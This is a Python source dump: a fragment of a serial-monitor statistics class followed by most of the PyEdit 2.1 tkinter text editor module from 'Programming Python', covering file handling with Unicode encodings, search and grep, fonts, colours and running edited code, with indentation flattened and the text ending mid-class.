# Compute rolling average baud speed on about 1 second window
n = 20
self.baudspeed_avg = (self.baudspeed + n * self.baudspeed_avg) / (n + 1)
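# This is an exponential moving average with weight 1/(n+1) on the newest
# sample; since samples are at least 0.05 s apart, n = 20 covers roughly
# 20 * 0.05 s = 1 s of data or more, matching the comment above.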
# Send cli system data to the topics so that they can be plotted.
self.topics.process("baudspeed",self.baudspeed)
self.topics.process("baudspeed_avg",self.baudspeed_avg)
self.topics.process("rx_in_waiting",measures['rx_in_waiting'])
self.topics.process("rx_in_waiting_max",measures['rx_in_waiting_max'])
self.topics.process("rx_in_waiting_avg",measures['rx_in_waiting_avg'])
def run(self):
while self.running.is_set():
if self.connected.is_set():
self.update()
self.computeStats()
else:
time.sleep(0.5)
|
_techreview-textEditor.py
|
"""
################################################################################
PyEdit 2.1: a Python/tkinter text file editor and component.
Uses the Tk text widget, plus GuiMaker menus and toolbar buttons to
implement a full-featured text editor that can be run as a standalone
program, and attached as a component to other GUIs. Also used by
PyMailGUI and PyView to edit mail text and image file notes, and by
PyMailGUI and PyDemos in pop-up mode to display source and text files.
New in version 2.1 (4E)
-updated to run under Python 3.X (3.1)
-added "grep" search menu option and dialog: threaded external files search
-verify app exit on quit if changes in other edit windows in process
-supports arbitrary Unicode encodings for files: per textConfig.py settings
-update change and font dialog implementations to allow many to be open
-runs self.update() before setting text in new editor for loadFirst
-various improvements to the Run Code option, per the next section
2.1 Run Code improvements:
-use base name after chdir to run code file, not possibly relative path
-use launch modes that support arguments for run code file mode on Windows
-run code inherits launchmodes backslash conversion (no longer required)
New in version 2.0 (3E)
-added simple font components input dialog
-use Tk 8.4 undo stack API to add undo/redo text modifications
-now verifies on quit, open, new, run, only if text modified and unsaved
-searches are case-insensitive now by default
-configuration module for initial font/color/size/searchcase
TBD (and suggested exercises):
-could also allow search case choice in GUI (not just config file)
-could use re patterns for searches (see text chapter)
-could experiment with syntax-directed text colorization (see IDLE, others)
-could try to verify app exit for quit() in non-managed windows too?
-could queue each result as found in grep dialog thread to avoid delay
-could use images in toolbar buttons (per examples of this in Chapter 9)
-could scan line to map Tk insert position column to account for tabs on Info
################################################################################
"""
Version = '2.1'
import sys, os # platform, args, run tools
from tkinter import * # base widgets, constants
from tkinter.filedialog import Open, SaveAs # standard dialogs
from tkinter.messagebox import showinfo, showerror, askyesno
from tkinter.simpledialog import askstring, askinteger
from tkinter.colorchooser import askcolor
from PP4E.Gui.Tools.guimaker import * # Frame + menu/toolbar builders
# general configurations
try:
import textConfig # startup font and colors
configs = textConfig.__dict__ # work if not on the path or bad
except: # define in client app directory
configs = {}
helptext = """PyEdit version %s
April, 2010
(2.0: January, 2006)
(1.0: October, 2000)
Programming Python, 4th Edition
Mark Lutz, for O'Reilly Media, Inc.
A text editor program and embeddable object
component, written in Python/tkinter. Use
menu tear-offs and toolbar for quick access
to actions, and Alt-key shortcuts for menus.
Additions in version %s:
- supports Python 3.X
- new "grep" external files search dialog
- verifies app quit if other edit windows changed
- supports arbitrary Unicode encodings for files
- allows multiple change and font dialogs
- various improvements to the Run Code option
Prior version additions:
- font pick dialog
- unlimited undo/redo
- quit/open/new/run prompt save only if changed
- searches are case-insensitive
- startup configuration module textConfig.py
"""
START = '1.0' # index of first char: row=1,col=0
SEL_FIRST = SEL + '.first' # map sel tag to index
SEL_LAST = SEL + '.last' # same as 'sel.last'
FontScale = 0 # use bigger font on Linux
if sys.platform[:3] != 'win': # and other non-Windows boxes
FontScale = 3
################################################################################
# Main class: implements editor GUI, actions
# requires a flavor of GuiMaker to be mixed in by more specific subclasses;
# not a direct subclass of GuiMaker because that class takes multiple forms.
################################################################################
class TextEditor: # mix with menu/toolbar Frame class
startfiledir = '.' # for dialogs
editwindows = [] # for process-wide quit check
# Unicode configurations
# imported in class to allow overrides in subclass or self
if __name__ == '__main__':
from textConfig import ( # my dir is on the path
opensAskUser, opensEncoding,
savesUseKnownEncoding, savesAskUser, savesEncoding)
else:
from .textConfig import ( # 2.1: always from this package
opensAskUser, opensEncoding,
savesUseKnownEncoding, savesAskUser, savesEncoding)
ftypes = [('All files', '*'), # for file open dialog
('Text files', '.txt'), # customize in subclass
('Python files', '.py')] # or set in each instance
colors = [{'fg':'black', 'bg':'white'}, # color pick list
{'fg':'yellow', 'bg':'black'}, # first item is default
{'fg':'white', 'bg':'blue'}, # tailor me as desired
{'fg':'black', 'bg':'beige'}, # or do PickBg/Fg chooser
{'fg':'yellow', 'bg':'purple'},
{'fg':'black', 'bg':'brown'},
{'fg':'lightgreen', 'bg':'darkgreen'},
{'fg':'darkblue', 'bg':'orange'},
{'fg':'orange', 'bg':'darkblue'}]
fonts = [('courier', 9+FontScale, 'normal'), # platform-neutral fonts
('courier', 12+FontScale, 'normal'), # (family, size, style)
('courier', 10+FontScale, 'bold'), # or pop up a listbox
('courier', 10+FontScale, 'italic'), # make bigger on Linux
('times', 10+FontScale, 'normal'), # use 'bold italic' for 2
('helvetica', 10+FontScale, 'normal'), # also 'underline', etc.
('arial', 10+FontScale, 'normal'),
('system', 10+FontScale, 'normal'),
('courier', 20+FontScale, 'normal')]
def __init__(self, loadFirst='', loadEncode=''):
if not isinstance(self, GuiMaker):
raise TypeError('TextEditor needs a GuiMaker mixin')
self.setFileName(None)
self.lastfind = None
self.openDialog = None
self.saveDialog = None
self.knownEncoding = None # 2.1 Unicode: till Open or Save
self.text.focus() # else must click in text
if loadFirst:
self.update() # 2.1: else @ line 2; see book
self.onOpen(loadFirst, loadEncode)
def start(self): # run by GuiMaker.__init__
self.menuBar = [ # configure menu/toolbar
('File', 0, # a GuiMaker menu def tree
[('Open...', 0, self.onOpen), # build in method for self
('Save', 0, self.onSave), # label, shortcut, callback
('Save As...', 5, self.onSaveAs),
('New', 0, self.onNew),
'separator',
('Quit...', 0, self.onQuit)]
),
('Edit', 0,
[('Undo', 0, self.onUndo),
('Redo', 0, self.onRedo),
'separator',
('Cut', 0, self.onCut),
('Copy', 1, self.onCopy),
('Paste', 0, self.onPaste),
'separator',
('Delete', 0, self.onDelete),
('Select All', 0, self.onSelectAll)]
),
('Search', 0,
[('Goto...', 0, self.onGoto),
('Find...', 0, self.onFind),
('Refind', 0, self.onRefind),
('Change...', 0, self.onChange),
('Grep...', 3, self.onGrep)]
),
('Tools', 0,
[('Pick Font...', 6, self.onPickFont),
('Font List', 0, self.onFontList),
'separator',
('Pick Bg...', 3, self.onPickBg),
('Pick Fg...', 0, self.onPickFg),
('Color List', 0, self.onColorList),
'separator',
('Info...', 0, self.onInfo),
('Clone', 1, self.onClone),
('Run Code', 0, self.onRunCode)]
)]
self.toolBar = [
('Save', self.onSave, {'side': LEFT}),
('Cut', self.onCut, {'side': LEFT}),
('Copy', self.onCopy, {'side': LEFT}),
('Paste', self.onPaste, {'side': LEFT}),
('Find', self.onRefind, {'side': LEFT}),
('Help', self.help, {'side': RIGHT}),
('Quit', self.onQuit, {'side': RIGHT})]
def makeWidgets(self): # run by GuiMaker.__init__
name = Label(self, bg='black', fg='white') # add below menu, above tool
name.pack(side=TOP, fill=X) # menu/toolbars are packed
# GuiMaker frame packs itself
vbar = Scrollbar(self)
hbar = Scrollbar(self, orient='horizontal')
text = Text(self, padx=5, wrap='none') # disable line wrapping
text.config(undo=1, autoseparators=1) # 2.0, default is 0, 1
vbar.pack(side=RIGHT, fill=Y)
hbar.pack(side=BOTTOM, fill=X) # pack text last
text.pack(side=TOP, fill=BOTH, expand=YES) # else sbars clipped
text.config(yscrollcommand=vbar.set) # call vbar.set on text move
text.config(xscrollcommand=hbar.set)
vbar.config(command=text.yview) # call text.yview on scroll move
hbar.config(command=text.xview) # or hbar['command']=text.xview
# 2.0: apply user configs or defaults
startfont = configs.get('font', self.fonts[0])
startbg = configs.get('bg', self.colors[0]['bg'])
startfg = configs.get('fg', self.colors[0]['fg'])
text.config(font=startfont, bg=startbg, fg=startfg)
if 'height' in configs: text.config(height=configs['height'])
if 'width' in configs: text.config(width =configs['width'])
self.text = text
self.filelabel = name
############################################################################
# File menu commands
############################################################################
def my_askopenfilename(self): # objects remember last result dir/file
if not self.openDialog:
self.openDialog = Open(initialdir=self.startfiledir,
filetypes=self.ftypes)
return self.openDialog.show()
def my_asksaveasfilename(self): # objects remember last result dir/file
if not self.saveDialog:
self.saveDialog = SaveAs(initialdir=self.startfiledir,
filetypes=self.ftypes)
return self.saveDialog.show()
def onOpen(self, loadFirst='', loadEncode=''):
"""
2.1: total rewrite for Unicode support; open in text mode with
an encoding passed in, input from the user, in textconfig, or
platform default, or open as binary bytes for arbitrary Unicode
encodings as last resort and drop \r in Windows end-lines if
present so text displays normally; content fetches are returned
as str, so need to encode on saves: keep encoding used here;
tests if file is okay ahead of time to try to avoid opens;
we could also load and manually decode bytes to str to avoid
multiple open attempts, but this is unlikely to try all cases;
encoding behavior is configurable in the local textConfig.py:
1) tries known type first if passed in by client (email charsets)
        2) if opensAskUser True, try user input next (prefill with defaults)
3) if opensEncoding nonempty, try this encoding next: 'latin-1', etc.
4) tries sys.getdefaultencoding() platform default next
5) uses binary mode bytes and Tk policy as the last resort
"""
if self.text_edit_modified(): # 2.0
if not askyesno('PyEdit', 'Text has changed: discard changes?'):
return
file = loadFirst or self.my_askopenfilename()
if not file:
return
if not os.path.isfile(file):
showerror('PyEdit', 'Could not open file ' + file)
return
# try known encoding if passed and accurate (e.g., email)
text = None # empty file = '' = False: test for None!
if loadEncode:
try:
text = open(file, 'r', encoding=loadEncode).read()
self.knownEncoding = loadEncode
except (UnicodeError, LookupError, IOError): # lookup: bad name
pass
# try user input, prefill with next choice as default
if text == None and self.opensAskUser:
self.update() # else dialog doesn't appear in rare cases
askuser = askstring('PyEdit', 'Enter Unicode encoding for open',
initialvalue=(self.opensEncoding or
sys.getdefaultencoding() or ''))
if askuser:
try:
text = open(file, 'r', encoding=askuser).read()
self.knownEncoding = askuser
except (UnicodeError, LookupError, IOError):
pass
# try config file (or before ask user?)
if text == None and self.opensEncoding:
try:
text = open(file, 'r', encoding=self.opensEncoding).read()
self.knownEncoding = self.opensEncoding
except (UnicodeError, LookupError, IOError):
pass
# try platform default (utf-8 on windows; try utf8 always?)
if text == None:
try:
text = open(file, 'r', encoding=sys.getdefaultencoding()).read()
self.knownEncoding = sys.getdefaultencoding()
except (UnicodeError, LookupError, IOError):
pass
# last resort: use binary bytes and rely on Tk to decode
if text == None:
try:
text = open(file, 'rb').read() # bytes for Unicode
text = text.replace(b'\r\n', b'\n') # for display, saves
self.knownEncoding = None
except IOError:
pass
if text == None:
showerror('PyEdit', 'Could not decode and open file ' + file)
else:
self.setAllText(text)
self.setFileName(file)
self.text.edit_reset() # 2.0: clear undo/redo stks
self.text.edit_modified(0) # 2.0: clear modified flag
def onSave(self):
self.onSaveAs(self.currfile) # may be None
def onSaveAs(self, forcefile=None):
"""
2.1: total rewrite for Unicode support: Text content is always
returned as a str, so we must deal with encodings to save to
a file here, regardless of open mode of the output file (binary
requires bytes, and text must encode); tries the encoding used
when opened or saved (if known), user input, config file setting,
and platform default last; most users can use platform default;
retains successful encoding name here for next save, because this
may be the first Save after New or a manual text insertion; Save
        and SaveAs may both use last known encoding, per config file (it
probably should be used for Save, but SaveAs usage is unclear);
gui prompts are prefilled with the known encoding if there is one;
does manual text.encode() to avoid creating file; text mode files
perform platform specific end-line conversion: Windows \r dropped
if present on open by text mode (auto) and binary mode (manually);
if manual content inserts, must delete \r else duplicates here;
knownEncoding=None before first Open or Save, after New, if binary Open;
encoding behavior is configurable in the local textConfig.py:
1) if savesUseKnownEncoding > 0, try encoding from last open or save
2) if savesAskUser True, try user input next (prefill with known?)
3) if savesEncoding nonempty, try this encoding next: 'utf-8', etc
4) tries sys.getdefaultencoding() as a last resort
"""
filename = forcefile or self.my_asksaveasfilename()
if not filename:
return
text = self.getAllText() # 2.1: a str string, with \n eolns,
encpick = None # even if read/inserted as bytes
# try known encoding at latest Open or Save, if any
if self.knownEncoding and ( # enc known?
(forcefile and self.savesUseKnownEncoding >= 1) or # on Save?
(not forcefile and self.savesUseKnownEncoding >= 2)): # on SaveAs?
try:
text.encode(self.knownEncoding)
encpick = self.knownEncoding
except UnicodeError:
pass
# try user input, prefill with known type, else next choice
if not encpick and self.savesAskUser:
self.update() # else dialog doesn't appear in rare cases
askuser = askstring('PyEdit', 'Enter Unicode encoding for save',
initialvalue=(self.knownEncoding or
self.savesEncoding or
sys.getdefaultencoding() or ''))
if askuser:
try:
text.encode(askuser)
encpick = askuser
except (UnicodeError, LookupError): # LookupError: bad name
pass # UnicodeError: can't encode
# try config file
if not encpick and self.savesEncoding:
try:
text.encode(self.savesEncoding)
encpick = self.savesEncoding
except (UnicodeError, LookupError):
pass
# try platform default (utf8 on windows)
if not encpick:
try:
text.encode(sys.getdefaultencoding())
encpick = sys.getdefaultencoding()
except (UnicodeError, LookupError):
pass
# open in text mode for endlines + encoding
if not encpick:
showerror('PyEdit', 'Could not encode for file ' + filename)
else:
try:
file = open(filename, 'w', encoding=encpick)
file.write(text)
file.close()
except:
showerror('PyEdit', 'Could not write file ' + filename)
else:
self.setFileName(filename) # may be newly created
self.text.edit_modified(0) # 2.0: clear modified flag
self.knownEncoding = encpick # 2.1: keep enc for next save
# don't clear undo/redo stks!
def onNew(self):
"""
start editing a new file from scratch in current window;
see onClone to pop-up a new independent edit window instead;
"""
if self.text_edit_modified(): # 2.0
if not askyesno('PyEdit', 'Text has changed: discard changes?'):
return
self.setFileName(None)
self.clearAllText()
self.text.edit_reset() # 2.0: clear undo/redo stks
self.text.edit_modified(0) # 2.0: clear modified flag
self.knownEncoding = None # 2.1: Unicode type unknown
def onQuit(self):
"""
on Quit menu/toolbar select and wm border X button in toplevel windows;
2.1: don't exit app if others changed; 2.0: don't ask if self unchanged;
moved to the top-level window classes at the end since may vary per usage:
a Quit in GUI might quit() to exit, destroy() just one Toplevel, Tk, or
edit frame, or not be provided at all when run as an attached component;
check self for changes, and if might quit(), main windows should check
other windows in the process-wide list to see if they have changed too;
"""
        assert False, 'onQuit must be defined in window-specific subclass'
def text_edit_modified(self):
"""
2.1: this now works! seems to have been a bool result type issue in tkinter;
2.0: self.text.edit_modified() broken in Python 2.4: do manually for now;
"""
return self.text.edit_modified()
#return self.tk.call((self.text._w, 'edit') + ('modified', None))
############################################################################
# Edit menu commands
############################################################################
def onUndo(self): # 2.0
try: # tk8.4 keeps undo/redo stacks
self.text.edit_undo() # exception if stacks empty
except TclError: # menu tear-offs for quick undo
showinfo('PyEdit', 'Nothing to undo')
def onRedo(self): # 2.0: redo an undone
try:
self.text.edit_redo()
except TclError:
showinfo('PyEdit', 'Nothing to redo')
def onCopy(self): # get text selected by mouse, etc.
if not self.text.tag_ranges(SEL): # save in cross-app clipboard
showerror('PyEdit', 'No text selected')
else:
text = self.text.get(SEL_FIRST, SEL_LAST)
self.clipboard_clear()
self.clipboard_append(text)
def onDelete(self): # delete selected text, no save
if not self.text.tag_ranges(SEL):
showerror('PyEdit', 'No text selected')
else:
self.text.delete(SEL_FIRST, SEL_LAST)
def onCut(self):
if not self.text.tag_ranges(SEL):
showerror('PyEdit', 'No text selected')
else:
self.onCopy() # save and delete selected text
self.onDelete()
def onPaste(self):
try:
text = self.selection_get(selection='CLIPBOARD')
except TclError:
showerror('PyEdit', 'Nothing to paste')
return
self.text.insert(INSERT, text) # add at current insert cursor
self.text.tag_remove(SEL, '1.0', END)
self.text.tag_add(SEL, INSERT+'-%dc' % len(text), INSERT)
self.text.see(INSERT) # select it, so it can be cut
def onSelectAll(self):
self.text.tag_add(SEL, '1.0', END+'-1c') # select entire text
self.text.mark_set(INSERT, '1.0') # move insert point to top
self.text.see(INSERT) # scroll to top
############################################################################
# Search menu commands
############################################################################
def onGoto(self, forceline=None):
line = forceline or askinteger('PyEdit', 'Enter line number')
self.text.update()
self.text.focus()
if line is not None:
maxindex = self.text.index(END+'-1c')
maxline = int(maxindex.split('.')[0])
if line > 0 and line <= maxline:
self.text.mark_set(INSERT, '%d.0' % line) # goto line
self.text.tag_remove(SEL, '1.0', END) # delete selects
self.text.tag_add(SEL, INSERT, 'insert + 1l') # select line
self.text.see(INSERT) # scroll to line
else:
showerror('PyEdit', 'Bad line number')
def onFind(self, lastkey=None):
key = lastkey or askstring('PyEdit', 'Enter search string')
self.text.update()
self.text.focus()
self.lastfind = key
if key: # 2.0: nocase
nocase = configs.get('caseinsens', True) # 2.0: config
where = self.text.search(key, INSERT, END, nocase=nocase)
if not where: # don't wrap
showerror('PyEdit', 'String not found')
else:
pastkey = where + '+%dc' % len(key) # index past key
self.text.tag_remove(SEL, '1.0', END) # remove any sel
self.text.tag_add(SEL, where, pastkey) # select key
self.text.mark_set(INSERT, pastkey) # for next find
self.text.see(where) # scroll display
def onRefind(self):
self.onFind(self.lastfind)
def onChange(self):
"""
non-modal find/change dialog
2.1: pass per-dialog inputs to callbacks, may be > 1 change dialog open
"""
new = Toplevel(self)
new.title('PyEdit - change')
Label(new, text='Find text?', relief=RIDGE, width=15).grid(row=0, column=0)
Label(new, text='Change to?', relief=RIDGE, width=15).grid(row=1, column=0)
entry1 = Entry(new)
entry2 = Entry(new)
entry1.grid(row=0, column=1, sticky=EW)
entry2.grid(row=1, column=1, sticky=EW)
def onFind(): # use my entry in enclosing scope
self.onFind(entry1.get()) # runs normal find dialog callback
def onApply():
self.onDoChange(entry1.get(), entry2.get())
Button(new, text='Find', command=onFind ).grid(row=0, column=2, sticky=EW)
Button(new, text='Apply', command=onApply).grid(row=1, column=2, sticky=EW)
new.columnconfigure(1, weight=1) # expandable entries
def onDoChange(self, findtext, changeto):
# on Apply in change dialog: change and refind
if self.text.tag_ranges(SEL): # must find first
self.text.delete(SEL_FIRST, SEL_LAST)
self.text.insert(INSERT, changeto) # deletes if empty
self.text.see(INSERT)
self.onFind(findtext) # goto next appear
self.text.update() # force refresh
def onGrep(self):
"""
new in version 2.1: threaded external file search;
search matched filenames in directory tree for string;
listbox clicks open matched file at line of occurrence;
search is threaded so the GUI remains active and is not
blocked, and to allow multiple greps to overlap in time;
        could use threadtools, but avoid loop if no active grep;
"""
from PP4E.Gui.ShellGui.formrows import makeFormRow
        # nonmodal dialog: get dirname, filenamepatt, grepkey
popup = Toplevel()
popup.title('PyEdit - grep')
var1 = makeFormRow(popup, label='Directory root', width=18, browse=False)
var2 = makeFormRow(popup, label='Filename pattern', width=18, browse=False)
var3 = makeFormRow(popup, label='Search string', width=18, browse=False)
var1.set('.') # current dir
var2.set('*.py') # initial values
Button(popup, text='Go',
command=lambda: self.onDoGrep(var1.get(), var2.get(), var3.get())).pack()
def onDoGrep(self, dirname, filenamepatt, grepkey):
# on Go in grep dialog: populate scrolled list with matches
# tbd: should producer thread be daemon so dies with app?
import threading, queue
# make non-modal un-closeable dialog
mypopup = Tk()
mypopup.title('PyEdit - grepping')
status = Label(mypopup, text='Grep thread searching for: %r...' % grepkey)
status.pack(padx=20, pady=20)
mypopup.protocol('WM_DELETE_WINDOW', lambda: None) # ignore X close
# start producer thread, consumer loop
myqueue = queue.Queue()
threadargs = (filenamepatt, dirname, grepkey, myqueue)
threading.Thread(target=self.grepThreadProducer, args=threadargs).start()
self.grepThreadConsumer(grepkey, myqueue, mypopup)
def grepThreadProducer(self, filenamepatt, dirname, grepkey, myqueue):
"""
in a non-GUI parallel thread: queue find.find results list;
could also queue matches as found, but need to keep window;
"""
from PP4E.Tools.find import find
matches = []
for filepath in find(pattern=filenamepatt, startdir=dirname):
try:
for (linenum, linestr) in enumerate(open(filepath)):
if grepkey in linestr:
message = '%s@%d [%s]' % (filepath, linenum + 1, linestr)
matches.append(message)
except UnicodeDecodeError:
print('Unicode error in:', filepath)
myqueue.put(matches)
def grepThreadConsumer(self, grepkey, myqueue, mypopup):
"""
in the main GUI thread: watch queue for results or [];
there may be multiple active grep threads/loops/queues;
there may be other types of threads/checkers in process,
especially when PyEdit is attached component (PyMailGUI);
"""
import queue
try:
matches = myqueue.get(block=False)
except queue.Empty:
self.after(250, self.grepThreadConsumer, grepkey, myqueue, mypopup)
else:
mypopup.destroy() # close status
self.update() # erase it now
if not matches:
showinfo('PyEdit', 'Grep found no matches for: %r' % grepkey)
else:
self.grepMatchesList(matches, grepkey)
def grepMatchesList(self, matches, grepkey):
# populate list after successful matches
from PP4E.Gui.Tour.scrolledlist import ScrolledList
print('Matches for %s: %s' % (grepkey, len(matches)))
# catch list double-click
class ScrolledFilenames(ScrolledList):
def runCommand(self, selection):
file, line = selection.split(' [', 1)[0].split('@')
editor = TextEditorMainPopup(loadFirst=file, winTitle=' grep match')
editor.onGoto(int(line))
editor.text.focus_force() # no, really
        # new non-modal window
popup = Tk()
popup.title('PyEdit - grep matches: %r' % grepkey)
ScrolledFilenames(parent=popup, options=matches)
############################################################################
# Tools menu commands
############################################################################
def onFontList(self):
self.fonts.append(self.fonts[0]) # pick next font in list
del self.fonts[0] # resizes the text area
self.text.config(font=self.fonts[0])
def onColorList(self):
self.colors.append(self.colors[0]) # pick next color in list
del self.colors[0] # move current to end
self.text.config(fg=self.colors[0]['fg'], bg=self.colors[0]['bg'])
def onPickFg(self):
self.pickColor('fg') # added on 10/02/00
def onPickBg(self): # select arbitrary color
self.pickColor('bg') # in standard color dialog
def pickColor(self, part): # this is too easy
(triple, hexstr) = askcolor()
if hexstr:
self.text.config(**{part: hexstr})
def onInfo(self):
"""
pop-up dialog giving text statistics and cursor location;
caveat (2.1): Tk insert position column counts a tab as one
character: translate to next multiple of 8 to match visual?
"""
text = self.getAllText() # added on 5/3/00 in 15 mins
bytes = len(text) # words uses a simple guess:
lines = len(text.split('\n')) # any separated by whitespace
words = len(text.split()) # 3.x: bytes is really chars
index = self.text.index(INSERT) # str is unicode code points
where = tuple(index.split('.'))
showinfo('PyEdit Information',
'Current location:\n\n' +
'line:\t%s\ncolumn:\t%s\n\n' % where +
'File text statistics:\n\n' +
'chars:\t%d\nlines:\t%d\nwords:\t%d\n' % (bytes, lines, words))
def onClone(self, makewindow=True):
"""
open a new edit window without changing one already open (onNew);
inherits quit and other behavior of the window that it clones;
2.1: subclass must redefine/replace this if makes its own popup,
else this creates a bogus extra window here which will be empty;
"""
if not makewindow:
new = None # assume class makes its own window
else:
new = Toplevel() # a new edit window in same process
myclass = self.__class__ # instance's (lowest) class object
myclass(new) # attach/run instance of my class
def onRunCode(self, parallelmode=True):
"""
run Python code being edited--not an IDE, but handy;
tries to run in file's dir, not cwd (may be PP4E root);
inputs and adds command-line arguments for script files;
code's stdin/out/err = editor's start window, if any:
run with a console window to see code's print outputs;
but parallelmode uses start to open a DOS box for I/O;
module search path will include '.' dir where started;
in non-file mode, code's Tk root may be PyEdit's window;
subprocess or multiprocessing modules may work here too;
2.1: fixed to use base file name after chdir, not path;
2.1: use StartArgs to allow args in file mode on Windows;
2.1: run an update() after 1st dialog else 2nd dialog
sometimes does not appear in rare cases;
"""
def askcmdargs():
return askstring('PyEdit', 'Commandline arguments?') or ''
from PP4E.launchmodes import System, Start, StartArgs, Fork
filemode = False
thefile = str(self.getFileName())
if os.path.exists(thefile):
filemode = askyesno('PyEdit', 'Run from file?')
self.update() # 2.1: run update()
if not filemode: # run text string
cmdargs = askcmdargs()
namespace = {'__name__': '__main__'} # run as top-level
sys.argv = [thefile] + cmdargs.split() # could use threads
exec(self.getAllText() + '\n', namespace) # exceptions ignored
elif self.text_edit_modified(): # 2.0: changed test
showerror('PyEdit', 'Text changed: you must save before run')
else:
cmdargs = askcmdargs()
mycwd = os.getcwd() # cwd may be root
dirname, filename = os.path.split(thefile) # get dir, base
os.chdir(dirname or mycwd) # cd for filenames
thecmd = filename + ' ' + cmdargs # 2.1: not theFile
if not parallelmode: # run as file
System(thecmd, thecmd)() # block editor
else:
if sys.platform[:3] == 'win': # spawn in parallel
run = StartArgs if cmdargs else Start # 2.1: support args
run(thecmd, thecmd)() # or always Spawn
else:
Fork(thecmd, thecmd)() # spawn in parallel
os.chdir(mycwd) # go back to my dir
def onPickFont(self):
"""
2.0 non-modal font spec dialog
2.1: pass per-dialog inputs to callback, may be > 1 font dialog open
"""
from PP4E.Gui.ShellGui.formrows import makeFormRow
popup = Toplevel(self)
popup.title('PyEdit - font')
var1 = makeFormRow(popup, label='Family', browse=False)
var2 = makeFormRow(popup, label='Size', browse=False)
var3 = makeFormRow(popup, label='Style', browse=False)
var1.set('courier')
var2.set('12') # suggested vals
var3.set('bold italic') # see pick list for valid inputs
Button(popup, text='Apply', command=
lambda: self.onDoFont(var1.get(), var2.get(), var3.get())).pack()
def onDoFont(self, family, size, style):
try:
self.text.config(font=(family, int(size), style))
except:
showerror('PyEdit', 'Bad font specification')
############################################################################
# Utilities, useful outside this class
############################################################################
def isEmpty(self):
return not self.getAllText()
def getAllText(self):
return self.text.get('1.0', END+'-1c') # extract text as str string
def setAllText(self, text):
"""
caller: call self.update() first if just packed, else the
initial position may be at line 2, not line 1 (2.1; Tk bug?)
"""
self.text.delete('1.0', END) # store text string in widget
self.text.insert(END, text) # or '1.0'; text=bytes or str
self.text.mark_set(INSERT, '1.0') # move insert point to top
self.text.see(INSERT) # scroll to top, insert set
def clearAllText(self):
self.text.delete('1.0', END) # clear text in widget
def getFileName(self):
return self.currfile
def setFileName(self, name): # see also: onGoto(linenum)
self.currfile = name # for save
self.filelabel.config(text=str(name))
def setKnownEncoding(self, encoding='utf-8'): # 2.1: for saves if inserted
self.knownEncoding = encoding # else saves use config, ask?
def setBg(self, color):
self.text.config(bg=color) # to set manually from code
def setFg(self, color):
self.text.config(fg=color) # 'black', hexstring
def setFont(self, font):
self.text.config(font=font) # ('family', size, 'style')
def setHeight(self, lines): # default = 24h x 80w
        self.text.config(height=lines)          # may also be from textConfig.py
def setWidth(self, chars):
self.text.config(width=chars)
def clearModified(self):
self.text.edit_modified(0) # clear modified flag
def isModified(self):
return self.text_edit_modified() # changed since last reset?
def help(self):
showinfo('About PyEdit', helptext % ((Version,)*2))
################################################################################
# Ready-to-use editor classes
# mixes in a GuiMaker Frame subclass which builds menu and toolbars
#
# these classes are common use cases, but other configurations are possible;
# call TextEditorMain().mainloop() to start PyEdit as a standalone program;
# redefine/extend onQuit in a subclass to catch exit or destroy (see PyView);
# caveat: could use windows.py for icons, but quit protocol is custom here.
################################################################################
#-------------------------------------------------------------------------------
# 2.1: on quit(), don't silently exit entire app if any other changed edit
# windows are open in the process - changes would be lost because all other
# windows are closed too, including multiple Tk editor parents; uses a list
# to keep track of all PyEdit window instances open in process; this may be
# too broad (if we destroy() instead of quit(), need only check children
# of parent being destroyed), but better to err on side of being too inclusive;
# onQuit moved here because varies per window type and is not present for all;
#
# assumes a TextEditorMainPopup is never a parent to other editor windows -
# Toplevel children are destroyed with their parents; this does not address
# closes outside the scope of PyEdit classes here (tkinter quit is available
# on every widget, and any widget type may be a Toplevel parent!); client is
# responsible for checking for editor content changes in all uncovered cases;
# note that tkinter's <Destroy> bind event won't help here, because its callback
# cannot run GUI operations such as text change tests and fetches - see the
# book and destroyer.py for more details on this event;
#-------------------------------------------------------------------------------
###################################
# when text editor owns the window
###################################
class TextEditorMain(TextEditor, GuiMakerWindowMenu):
"""
main PyEdit windows that quit() to exit app on a Quit in GUI, and build
a menu on a window; parent may be default Tk, explicit Tk, or Toplevel:
parent must be a window, and probably should be a Tk so this isn't silently
    destroyed and closed with a parent; all main PyEdit windows check all other
PyEdit windows open in the process for changes on a Quit in the GUI, since
a quit() here will exit the entire app; the editor's frame need not occupy
entire window (may have other parts: see PyView), but its Quit ends program;
onQuit is run for Quit in toolbar or File menu, as well as window border X;
"""
def __init__(self, parent=None, loadFirst='', loadEncode=''):
# editor fills whole parent window
GuiMaker.__init__(self, parent) # use main window menus
TextEditor.__init__(self, loadFirst, loadEncode) # GuiMaker frame packs self
self.master.title('PyEdit ' + Version) # title, wm X if standalone
self.master.iconname('PyEdit')
self.master.protocol('WM_DELETE_WINDOW', self.onQuit)
TextEditor.editwindows.append(self)
def onQuit(self): # on a Quit request in the GUI
close = not self.text_edit_modified() # check self, ask?, check others
if not close:
close = askyesno('PyEdit', 'Text changed: quit and discard changes?')
if close:
windows = TextEditor.editwindows
changed = [w for w in windows if w != self and w.text_edit_modified()]
if not changed:
GuiMaker.quit(self) # quit ends entire app regardless of widget type
else:
numchange = len(changed)
verify = '%s other edit window%s changed: quit and discard anyhow?'
verify = verify % (numchange, 's' if numchange > 1 else '')
if askyesno('PyEdit', verify):
GuiMaker.quit(self)
class TextEditorMainPopup(TextEditor, GuiMakerWindowMenu):
"""
popup PyEdit windows that destroy() to close only self on a Quit in GUI,
and build a menu on a window; makes own Toplevel parent, which is child
to default Tk (for None) or other passed-in window or widget (e.g., a frame);
adds to list so will be checked for changes if any PyEdit main window quits;
if any PyEdit main windows will be created, parent of this should also be a
PyEdit main window's parent so this is not closed silently while being tracked;
onQuit is run for Quit in toolbar or File menu, as well as window border X;
"""
def __init__(self, parent=None, loadFirst='', winTitle='', loadEncode=''):
# create own window
self.popup = Toplevel(parent)
GuiMaker.__init__(self, self.popup) # use main window menus
TextEditor.__init__(self, loadFirst, loadEncode) # a frame in a new popup
assert self.master == self.popup
self.popup.title('PyEdit ' + Version + winTitle)
self.popup.iconname('PyEdit')
self.popup.protocol('WM_DELETE_WINDOW', self.onQuit)
TextEditor.editwindows.append(self)
def onQuit(self):
close = not self.text_edit_modified()
if not close:
close = askyesno('PyEdit', 'Text changed: quit and discard changes?')
if close:
self.popup.destroy() # kill this window only
TextEditor.editwindows.remove(self) # (plus any child windows)
def onClone(self):
TextEditor.onClone(self, makewindow=False) # I make my own pop-up
#########################################
# when editor embedded in another window
#########################################
class TextEditorComponent(TextEditor, GuiMakerFrameMenu):
"""
attached PyEdit component frames with full menu/toolbar options,
